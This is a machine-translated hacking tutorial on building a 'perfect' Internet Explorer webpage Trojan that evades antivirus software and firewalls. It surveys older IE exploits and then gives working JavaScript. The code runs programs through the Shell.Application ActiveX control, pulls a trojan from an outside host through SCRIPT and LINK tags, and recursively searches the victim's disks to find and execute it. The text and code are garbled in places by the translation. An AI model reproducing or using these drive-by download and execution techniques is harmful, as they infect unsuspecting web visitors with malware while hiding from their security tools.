Author: bixue Source: Eighth Army
To create a perfect IE webpage Trojan, we must first develop a perfect standard for us. I personally think that a perfect IE webpage Trojan should have at least four of the following features:
1. Attackers can bypass antivirus software attacks;
2. network firewall alarms can be avoided;
Iii. applicable to most IE versions (including IE5.0, IE5.5, and IE6.0) in most WINDOWS operating systems (including WIN98, WINME, WIN2000, WINXP, and WIN2003 ), it is best to bring down the SP patch;
4. It makes it difficult for viewers to discover the changes in IE, that is, they can be quietly invisible for a long time.
(Note that the above four points only refer to the webpage, but do not include your Trojan program. That is to say, our webpage Trojan is only responsible for running the specified Trojan program, as for the quality of your Trojan program, only you have to choose it! Don't ask me for it. I won't write it !)
Meet the above four points I want to make your horse more youthful and longer-lasting, faster ......
After reading the above points, Are you tempted? Don't worry. Let's start with the shortcomings of the existing Internet Web Trojans!
First: IE webpage trojan that exploits the ancient MIME Vulnerability
This kind of Trojan is still popular, but because the vulnerability is too old and has few suitable IE versions, the impacts were too great at the time, and the patches were almost completed, therefore, the planting success rate of this trojan is relatively low.
Second, use the com. ms. activeX. ActiveXComponent vulnerability, and combine the IE web Trojan of the wsh and FSO controls
Although com. ms. activeX. the ActiveXComponent vulnerability is widely used in most IE versions. It is a good vulnerability and has a high exploitation value. However, it combines WSH and FSO controls called by popular viruses, although it can avoid network firewall alarms, it can escape the pursuit of anti-virus software (such as Norton ).
Third: the OBJECT Data Remote vulnerability combined with the IE web Trojan of the wsh and FSO controls (typically represented by an animation shark web Trojan generator)
The biggest advantage of this trojan is that it is suitable for many Internet Explorer versions and has newer vulnerabilities, but it has the following shortcomings:
1. In this case, mshta.exe is used to access the network to download the trojan program, which will cause firewall alarms (such as Skynet firewall );
2. If the IE web trojan uses the WSH and FSO controls, it will also escape the pursuit of anti-virus software (such as Norton ).
The shark web trojan uses the WSH and FSO controls to sigh ...... Unfortunately ......?
3. This vulnerability requires Web servers to support dynamic web pages, such as ASP, JSP, and CGI, which affects the performance of web servers, after all, the free and stable dynamic web page space is few. Although this vulnerability can also be exploited in the form of mail MIME (see my article on security focus: due to the exploitation of the error MIME vulnerability ...... --- IE Object Data Remote Execution Vulnerability of the use of http://www.xfocus.net/articles/200309/607.html), but the test found that IE6.0 does not work.
If you see the analysis above, do you have this feeling: qianjun is easy to get, it will be hard to find, Ma Er groups, but qianqianma is hard to find! Don't worry. Let me take this together to create the perfect IE webpage trojan in my heart.
First of all, we need to get rid of anti-virus software, so we cannot use the WSH and FSO controls, because as long as we use the WSH and FSO controls, we will not be able to escape the "Norton" command, how can we do this ?! Don't worry. After my hard work (I was also inspired by the accidental discovery of ASP Trojans), I finally found a usable control, shell. application, which has passed Security Authentication, can be smoothly executed on the webpage in the "my computer" domain, it is easier to obtain execution permissions than WSH and FSO (you can exploit cross-origin vulnerabilities). See the following javascript code:
<Script language = "javascript" type = "text/javascript">
Var shell = new ActiveXObject ("shell. application ");
Shell. namespace ("c: \ Windows \"). items (). item ("Notepad.exe"). invokeverb ();
</SCRIPT>
Save it as test.htm and check whether the Notepad program is automatically opened. The prompt box Indicating whether to allow running is not displayed like WSH and FSO. Is it a bit of interest? Now we can run all programs with known paths, but we need to run our own Trojan program, we also need to download our Trojan program to the viewer's computer and find its location. One by one:
1. Download the trojan program to the viewer's computer.
There are many solutions to this problem. For example, I mentioned the WINDOWS Help File Access Protocol to download arbitrary file vulnerabilities (its :), but this time we don't need it. We will teach you two better download methods:
Example 1: using the SCRIPT tag, the Code is as follows:
<Script language = "icyfoxlovelace" src = "http://www.godog.y365.com/wodemuma/icyfox.bat"> </SCRIPT>
Note that the LANGUAGE attribute here can be a string other than javascript, VBScript, and JScript, or a Chinese character. The src attribute is the address of your Trojan! Because currently free space is not allowed to upload exe files for security reasons, we can change the extension exe to bat, pif, scr, and com.
Example 2: using the LINK tag, the Code is as follows:
<LINK href = "http://www.godog.y365.com/wodemuma/icyfox.bat" rel = stylesheet type = text/css>
Place the code in the middle of the tag <HEAD> </HEAD>. The href attribute value is the trojan program address.
The above two are the best methods for downloading Trojans I know. The Downloaded Programs are saved in the subdirectory of the Temporary IE directory Temporary Internet Files.
2. Find the trojan program path that has been downloaded to the viewer.
We can use shell. some attributes and methods of the application control, combined with the js error handling try {} catch (e) {} finally {} statement, are recursively called to find the trojan program path, the Code is as follows: function icyfoxlovelace (){
// Obtain the WINDOWS System directory and System Disk
Url = document. location. href;
Xtmu = url. substring (6, url. indexOf ('\', 9) + 1 );
Xtp = url. substr (6, 3 );
Var shell = new ActiveXObject ("shell. application ");
Var runbz = 1;
// Set the trojan size in bytes.
// Change 198201 to the actual size of your Trojan program
Var exeSize = 198201;
// Sets the trojan program name and Extension (exe, com, bat, pif, scr) to determine whether the trojan program is downloaded.
// Change icyfox in the following two lines to your Trojan program name, and change bat to your Trojan program extension.
Var a =/icyfox \ [\ d * \] \. bat/gi;
A. compile ("icyfox \ [\ d * \] \. bat", "gi ");
Var B =/[A-Za-z]: \/gi;
B. compile ("[A-Za-z]: \\\\", "gi"); // regular expression used to determine whether it is the root directory of the Disk
// The following code finds and runs the trojan program
Wjj (xtmu + "Temporary Internet Files \"); // Content. IE5 \ if (runbz) wjj (xtp + "Documents and Settings \\");
If (runbz) yp ();
// Search for and run the trojan program in all hard disk partitions
Function yp (){
Try {
Var c = new Enumerator (shell. namespace ("c: \"). ParentFolder. Items ());
For (;! C. atEnd (); c. moveNext ()){
If (runbz) {if (B. test (c. item (). path) wjj (c. item (). path );}
Else break;
}
} Catch (e ){}
}
// Recursively search for and run the trojan program in a specified directory (including sub-Directories)
Function wjj (B ){
Try {
Var c = new Enumerator (shell. namespace (B). Items ());
For (;! C. atEnd (); c. moveNext ()){
If (runbz & c. item (). Size = exeSize & a. test (c. item (). path )){
Var f = c. item (). path;
Var v = f. lastIndexOf ('\') + 1;
Try {
Shell. namespace (f. substring (0, v). items (). item (f. substr (v). invokeverb (); // run the trojan program
Runbz = 0;
Break;
} Catch (e ){}
}
If (! C. item (). Size) wjj (c. item (). path + "\"); // recursively calls a subdirectory
}
} Catch (e ){}
}
}
Icyfoxlovelace ();
Save the above Code as icyfox. js.